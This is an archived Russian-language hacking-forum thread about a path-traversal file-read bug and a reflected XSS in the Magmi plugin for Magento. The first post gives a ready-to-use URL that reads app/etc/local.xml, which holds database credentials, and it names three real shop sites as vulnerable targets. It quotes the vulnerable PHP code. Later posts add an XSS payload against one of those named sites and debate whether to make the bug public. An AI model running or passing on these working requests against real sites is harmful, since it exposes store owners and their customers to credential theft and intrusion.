PDA

Просмотр полной версии : Локальня читалка Magento


winstrool
17.02.2015, 21:44
Локальня читалка Magento:

http://localhost/magmi/web/download_file.php?file=../../app/etc/local.xml

Пример уязвимых урлов:


_http://bentextiles.com/magmi/web/download_file.php?file=../../app/etc/local.xml
_http://mengotti-online.com/shop/magmi/web/download_file.php?file=../../app/etc/local.xml
_http://www.lowellcraft.com/magmi/web/download_file.php?file=../../app/etc/local.xml


Уязвимый код:


PHP:
$file=$_REQUEST["file"];

$f=@fopen($file,"r");

$err=error_get_last();

if($f!==false)

{

@fclose($f);

}

if($err==null)

{

// Extract the type of file which will be s ent to the browser as a header

$type=filetype($file);



// Get a date and timestamp

$today=date("F j, Y, g:i a");

$time=time();



// Send file headers

header("Content-type:$type");

header("Content-Disposition: attachment;filename=".basename($file));

header("Content-Transfer-Encoding: binary");

header('Pragma: no-cache');

header('Expires: 0');

// Send the file contents.

set_time_limit(0);

readfile($file);

}

else

{

print_r($err);

}

P.S: В гугле по этой баге ничего не нашел.

P.S:

Обнаружил случайно в пакете с обновлением фикса баги

_http://www.exploit-db.com/exploits/35052/

сам фикс с багой, читалкой на гитхабе

https://github.com/dweeves/magmi-git Magento CE 1.8.x & 1.9.x

Strilo4ka
18.05.2015, 21:30
Хм, Magento на FreeBSD, возможно, можно сразу скомпроментировать, так как при чтении директории(это тоже файл!) можно получить список файлов. Сессия по умолчанию пишется в файловую си-му в install-dir/var/session обычно, в БД редко(в Wizard установщике по дефолту файловая си-ма )

winstrool
06.09.2015, 14:53
Может пора спустить в паблик?

BigBear
06.09.2015, 16:39
Не стоит

Rebz
07.09.2015, 11:26
В целом, стоит - не стоит, решать автору

winstrool
07.09.2015, 11:42
спускай, а на гитхабе сделаем ссылку на пост)) пускай фиксят, бага все равно мало полезная...

P.S:Пасивная XSS

http://www.lowellcraft.com/magmi/web/ajax_gettime.php

POSTrefix=alert('xss')

magmi/web/ajax_gettime.php


PHP:


При GET запросе на примерной площадке сробатывает мод секьюрети

winstrool
06.01.2016, 16:59
ППЦ(((( https://www.trustwave.com/Resources...mmerce-platform-Magento-targeted-in-the-wild/ (https://www.trustwave.com/Resources/SpiderLabs-Blog/Zero-day-in-Magmi-database-client-for-popular-e-commerce-platform-Magento-targeted-in-the-wild/) - себе багу присвоили, разместили статью от 13.10.2015

ZodiaX
06.01.2016, 19:11
Оперативно они...

хм, похожая бага тоже от февраля https://packetstormsecurity.com/files/130250/magmi-lfixss.txt

winstrool
06.01.2016, 20:54
ZodiaX said:
↑ (https://antichat.live/posts/3936871/)
Оперативно они...
хм, похожая бага тоже от февраля
https://packetstormsecurity.com/files/130250/magmi-lfixss.txt


Да, только там при правильном подходе идет выполнения php кода, а тут просто читалка